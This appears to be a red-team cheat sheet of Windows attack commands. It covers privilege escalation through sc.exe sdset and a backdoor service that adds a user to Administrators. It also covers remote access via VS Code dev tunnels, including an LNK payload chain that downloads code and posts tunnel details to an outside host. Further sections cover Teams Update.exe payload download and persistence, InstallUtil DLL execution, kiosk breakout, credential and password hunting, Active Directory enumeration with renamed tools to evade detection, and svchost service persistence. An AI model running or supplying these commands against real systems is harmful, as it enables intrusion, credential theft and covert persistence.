C:\Windows\System32\psr.exe /stop
sc.exe / sdset - ESCALATE / PERSISTENT BACKDOOR

ACE = D:(A;<ace_flags>;KA;<object_guid>;<inherit_object_guid>;WD) D: Discretionary ACL no <ace_flags> set A; Access Allowed KA; Key_ALL_ACCESS no or WD = ‘Everyone’ Security Principal (AU = Auth Users, BA = Built-in Admins, etc) Elevated - Grant everyone all permissions on the control manager

sc.exe - sdset to grant SYSTEM to all users w/ manager
sc.exe sdset scmanager D:(A;;KA;;;WD)


# Switch User
Switch to 'lowpriv' backdoor user

# Create service as user "lowpriv"
cmd.exe sc create DirectXDiagnostics displayName= "DirectXDiagnostics" binPath="C:\Windows\System32\net.exe localgroup Administrators lowpriv /add" start= auto

# Check status
sc query DirectXDiagnostics
BGInfo.exe - Sysinternals - Create new custom field to run VBSScript or WMI queries, etc
Description of image 
.\bginfo.exe

C:\ProgramData\chocolatey\lib\sysinternals\tools\Bginfo.exe
Code.exe - Dev Tunnel - Reverse Powershell Session over MS Infra
 & "C:\Program Files\Microsoft VS Code\Code.exe" tunnel --accept-server-license-terms --name "tunnel-name"

# Download portable VS Cli
iwr https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64 -o code.zip
expand-archive .\code.zip

# Redirect stdout to file
Start-Process -FilePath .\code.exe  -ArgumentList "tunnel --name FudgeTunnel" -RedirectStandardOutput  .\output.txt

# Logout of tunnel
.\code.exe tunnel user logout
Code.exe - Dev tunnel - Full Chain w/ LNK prep
Could try c:\Windows\Temp directory and specify —cli-data-dir for AWL bypass
#Payload
$EXEPath = "$env:windir\System32\WindowsPowerShell\v1.0\powershell.exe"
$pay = 'mkdir c:\Temp && cd C:\temp; iwr -uri https://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip -OutFile vscode.zip; Expand-Archive vscode.zip; cd vscode; .\code.exe tunnel user logout; Start-Sleep 3; Start-Process -FilePath .\code.exe  -ArgumentList "tunnel","--name","fudgetunnel" -RedirectStandardOutput  .\output.txt; Start-Sleep 3; iwr -uri cf9dk1w2vtc0000vhr10g8ws3ohyyyyyb.oast.fun -Method Post -Body (Get-Content .\output.txt)'
$arguments = " -nop -c $pay"

#lnk file
$LNKName = 123
$obj = New-Object -ComObject WScript.Shell
$link = $obj.CreateShortcut((Get-Location).Path + "\" + $LNKName + ".lnk")
$link.WindowStyle = '7'
$link.TargetPath = $EXEPath
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13"
$link.Arguments = $arguments
$link.Save()
Teams / Update.exe - Download and AWL Bypass via NuGet Packages in RELEASE file
# download
%localappdata%\Microsoft\Teams\update.exe --download https://github.com/attacker/RELEASE

# update web, share and rollback from share
%localappdata%\Microsoft\Teams\update.exe --update https://github.com/attacker/RELEASE
%localappdata%\Microsoft\Teams\update.exe --update=\\remoteserver\payloadFolder
%localappdata%\Microsoft\Teams\update.exe --updateRollback=\\remoteserver\payloadFolder

# Exec - Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command
Update.exe --processStart payload.exe --process-start-args "whatever args"
Teams / Update.exe - Persistence
Copy your payload into “%localappdata%\Microsoft\Teams\current”. Then run the command. Update.exe will create a payload.exe shortcut in “%appdata%\Microsoft\Windows\Start Menu\Programs\Startup”. Then payload will run on every login of the user who runs it.
%localappdata%\Microsoft\Teams\update.exe --createShortcut=payload.exe -l=Startup

%localappdata%\Microsoft\Teams\update.exe --removeShortcut=payload.exe -l=Startup
Expand/InstallUtil - Place installer/payload dlls in CAB on SMB share, Expand and Background Execute Payload DLL with Installer dll using Uninstall option, no logging
expand \\192.168.0.122\corporate\newpdf.cab -F:* . && set URL="http://attacker.azurewebsites.net:8080" && set DLL=".\newpdf.dll" && start /B cmd /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe /logfile= /u /dll=%DLL% /url=%URL% .\installer.dll >nul 2>&1" 

# Mark them hidden until you're done
attrib +h newpdf.dll && attrib +h installer.dll

# kill installutil to delete the files
taskkill /IM installutil.exe /F

Kiosks, Application Escape and Breakout

Getting a shell

  • Shortcut: [Window] + [R] -> cmd [CTRL] + [SHIFT] + [ESC] -> Task Manager [CTRL] + [ALT] + [DELETE] -> Task Manager

  • Access through file browser: Browsing to the folder containing the binary (i.e. C:\windows\system32), we can simply right click and open it

  • Drag-and-drop: dragging and dropping any file onto the cmd.exe

  • Hyperlink: file:///c:/Windows/System32/cmd.exe

  • Task Manager: File > New Task (Run…) > cmd

  • MSPAINT.exe: Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels Zoom in to make the following tasks easier Using the colour picker, set pixels values to (from left to right):

1st: R: 10, G: 0, B: 0 2nd: R: 13, G: 10, B: 13 3rd: R: 100, G: 109, B: 99 4th: R: 120, G: 101, B: 46 5th: R: 0, G: 0, B: 101 6th: R: 0, G: 0, B: 0 Save it as 24-bit Bitmap (.bmp;.dib) Change its extension from bmp to bat and run

  • Sticky Keys: Spawn the sticky keys dialog

  • Via Shell URI: shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

  • Hit 5 times [SHIFT]

  • Visit “Ease of Access Center”

  • You land on “Setup Sticky Keys:, move up a level on “Ease of Access Center”

  • Start the OSK (On-Screen-Keyboard) You can now use the keyboard shortcut (CTRL+N)

  • Dialog Boxes

    • Creating new files

      • Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
      • Shortcuts – Right click > New > Shortcut > %WINDIR%\system32

    • Open a new Windows Explorer instance

      • Right click any folder > select Open in new window

    • Exploring Context Menus

      • Right click any file/folder and explore context menus
      • Clicking Properties, especially on shortcuts, can yield further access via Open File Location

    • Save as

      • “Save as” / “Open as” option
      • “Print” feature – selecting “print to file” option (XPS/PDF/etc)
      • \127.0.0.1\c$\Windows\System32\ and execute cmd.exe

    • Input Boxes

      • Many input boxes accept file paths; try all inputs with UNC paths such as //attacker–pc/ or //127.0.0.1/c$ or C:\

    • Bypass file restrictions

      • Enter . or *.exe or similar in File name box

    • Internet Explorer

      • Download and Run/Open
      • Text files -> opened by Notepad

    • Menus

      • The address bar
      • Search menus
      • Help menus
      • Print menus
      • All other menus that provide dialog boxes

    • Accessing filesystem

      • Enter these paths in the address bar:
      • file://C:/windows
      • C:/windows/
      • %HOMEDRIVE%
      • \127.0.0.1\c$\Windows\System32

    • Unassociated Protocols

      • It is possible to escape a browser based kiosk with other protocols than usual http or https. If you have access to the address bar, you can use any known protocol (irc, ftp, telnet, mailto, etc.) to trigger the open with prompt and select a program installed on the host. The program will then be launched with the uri as a parameter, you need to select a program that will not crash when receiving it. It is possible to send multiple parameters to the program by adding spaces in your uri.

      • Note: This technique requires that the protocol used is not already associated with a program.

      • Example - Launching Firefox with a custom profile:

        • This is a nice trick since Firefox launched with the custom profile may not be as much hardened as the default profile.
        • Firefox needs to be installed.
        • Enter the following URI in the address bar: irc://127.0.0.1 -P "Test"
        • Press enter to navigate to the URI.
        • Select the Firefox program.
        • Firefox will be launched with the profile Test.
        • In this example, it’s the equivalent of running the following command: firefox irc://127.0.0.1 -P "Test"

    • Shell URI Handlers

      • shell:DocumentsLibrary
      • shell:Libraries
      • shell:UserProfiles
      • shell:Personal
      • shell:SearchHomeFolder
      • shell:System
      • shell:NetworkPlacesFolder
      • shell:SendTo
      • shell:Common Administrative Tools
      • shell:MyComputerFolder
      • shell:InternetFolder

Post-Exploitation - Sadrat Beacon

Cmdkey, Check WDigest and Cached Cred count
shell cmdkey /list
shell reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Search for Passwords locally and in Sysvol
shell set DOMAIN="domain.com"
shell cd "C:\"
shell findstr /snip password *.xml *.ini *.txt *.xls *.xlsx *.docx *.pdf
shell findstr /snip password *
shell dir /s *password* == *cred* == *.config* == *key*
shell findstr /S /I cpassword \\%DOMAIN%\sysvol\%DOMAIN%\policies\*.xml
Prepare Script - Find Open Shares, make a list of them and search for passwords
@echo off
for /F "tokens=*" %%a in (found_shares.txt) do (
 C:
 NET USE Z: /delete /y
 net use z: “%%a
 Z:
 echo %%a
 echo %%a >> "C:\Temp\output_file.txt"
 if exist z:\ ( findstr /snip password * >> "C:\Temp\output_file.txt" )
)

download sharing.bat
shell sharing.bat
Establish devtunnel
# download Code.exe from Teamserver
download Code.exe
shell Code.exe tunnel --accept-server-license-terms --name "tunnel-name"

# Logout of tunnel
shell Code.exe tunnel user logout
Download and Execute supersharpshares as settingsynchost - Blocked by MDE now Q1/2024
download sssh.exe
shell move sssh.exe settingsynchost.exe
shell move settingsynchost.exe %TEMP%
shell "C:\Windows\System32\SettingSyncHost.exe -LoadAndRunDiagScriptNoCab DoesntMatter"
nltest - cosplay a ransomware operator
# get user info
shell set USER=%USERNAME% && nltest /user:%USER%

# get DCs
shell nltest /dclist:%DOMAIN%
dsquery.exe - Yololbin - cli LDAP query tool

dsquery https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb

# package dsquery.exe and dsquery.dll into .cab
download ds.cab
shell expand ds.cab -F:* .
shell dsquery.exe

# find all users, groups, OUs, Computers, Servers
shell dsquery user
shell dsquery group
shell dsquery ou
shell dsquery computer
shell dsquery server

# name and SAm of all windows machines
shell dsquery * -filter “(&(objectclass=computer)(name=*win*))” -attr name samaccountname -d 192.168.2.1

# admin groups 2.1 is the DC
shell "dsquery group -name *admin* -d 192.168.2.1"
shell "dsquery * -filter “(&(objectclass=group)(name=*admin*))” -attr name samaccountname -d 192.168.2.1"
shell "dsquery * -filter “(&(objectclass=group)(samaccountname=Domain Admins))” -attr name samaccountname member -d 192.168.2.1"
PortQuery
download portqry.exe
shell portqry -n %IP% -e 3389
LDP.exe - LDAP GUI query and edit tool bring it over from the server
mv ldp.exe pdl.exe
...
download pdl.exe
shell pdl.exe
ADExplorer Snapshot - Requires GUI Access

Snapshot parser:

# Download to teamserver
# curl https://download.sysinternals.com/files/AdExplorer.zip -o adexplorer.zip && unzip adexplorer.zip

cp ~/laughriot/yololbins/AdExplorer64.exe adexplorer.exe
mv adexplorer.exe skype4all.exe
...

# download through the implant, open GUI, take snapshot
download skype4all.exe
shell skype4all.exe
upload snapshot.dat
...

# parse it as Bloodhound output
python ADExplorerSnapshot.py -m Bloodhound snapshot.dat
ShareEnum - Sysinternals GUI Sharefinder
# download to Teamserver
curl https://download.sysinternals.com/files/ShareEnum.zip -o shares.zip && unzip shares.zip
mv ShareEnum.exe sen.exe 
...
download sen.exe
shell sen.exe
QEMU - Setup a VM Beachhead
cp ~/laughriot/yololgins/qemu.cab .
download qemu.cab
shell

Persistence

SVCHost - TinyTurla Style Persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v sysman /t REG_MULTI_SZ /d "sdm" /f
reg add "HKLM\SYSTEM\CurrentControlSet\services\sdm\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\dcmd.dll" /f
sc create sdm binPath= "c:\windows\system32\svchost.exe -k sysman" type= share start= auto
sc config sdm DisplayName= "System Device Manager"
sc description sdm "Creates and manages system-mode driver processes. This service cannot be stopped."
sc start sdm